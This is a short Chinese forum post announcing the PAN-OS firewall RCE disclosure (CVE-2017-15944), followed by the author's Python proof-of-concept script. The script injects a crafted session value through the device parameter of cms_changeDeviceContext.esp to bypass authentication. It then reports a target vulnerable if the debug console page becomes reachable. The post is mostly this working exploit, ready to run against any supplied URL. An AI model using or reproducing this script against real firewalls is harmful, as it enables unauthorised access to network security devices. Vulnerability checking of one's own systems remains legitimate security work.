早上看到 Palo Alto Networks firewalls 爆出RCE漏洞http://seclists.org/fulldisclosure/2017/Dec/38
到公司赶紧测试了下,并写了POC ,https://github.com/0xbug/CVE-2017-15944-POC

import requests
import sys

if len(sys.argv) > 1:
    target = sys.argv[1]

    create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(
        target)
    verify_url = '{}/php/utils/debug.php'.format(target)

    session = requests.Session()
    if 'https' in target:
        session.get(verify_url, verify=False)
        session.get(create_session_url, verify=False)
        verify = session.get(verify_url, verify=False)
    else:
        session.get(verify_url)
        session.get(create_session_url)
        verify = session.get(verify_url)

    if 'Debug Console' in verify.text:
        print('{} is vul'.format(target))
    else:
        print('{} is not vul'.format(target))
else:
    print('Usage: python panos-poc.py panurl')

点击收藏 | 0 关注 | 0
登录 后跟帖